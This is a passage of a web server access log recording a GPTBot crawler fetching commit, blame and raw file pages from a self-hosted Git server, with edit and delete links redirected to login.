+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:16:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:16:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11158] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33372] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:16:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:16:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:16:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:25:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10523] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10008] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:16:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:16:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9972] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:16:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42449] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:16:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:16:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:16:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9971] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:16:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42450] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:16:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21631] [Gzip 28.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:16:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21629] [Gzip 28.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:16:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:16:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:16:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9928] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10088] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10069] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor?display=rendered" [Client 74.7.227.38] [Length 12364] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" +[17/Feb/2026:16:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor?display=rendered" [Client 74.7.227.38] [Length 12590] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" +[17/Feb/2026:16:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/projects?q=&sort=reversealphabetically&state=open" [Client 74.7.227.38] [Length 7807] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/projects" +[17/Feb/2026:16:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" +[17/Feb/2026:16:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 10892] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json" +[17/Feb/2026:16:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 17056] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" +[17/Feb/2026:16:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/2.conf?display=source" [Client 74.7.227.38] [Length 12769] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:16:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/4.conf?display=source" [Client 74.7.227.38] [Length 12776] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:16:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/3.conf?display=source" [Client 74.7.227.38] [Length 13896] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:16:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/1.conf?display=source" [Client 74.7.227.38] [Length 12982] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:16:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12944] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:16:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11166] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:16:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12014] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/compare/main...main?expand=1" [Client 74.7.227.38] [Length 8407] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" +[17/Feb/2026:16:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/main...main?expand=1" [Client 74.7.227.38] [Length 8405] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:16:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 17919] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest" +[17/Feb/2026:16:26:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:16:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:16:26:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:16:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:16:26:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 10001] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:16:26:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 950] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 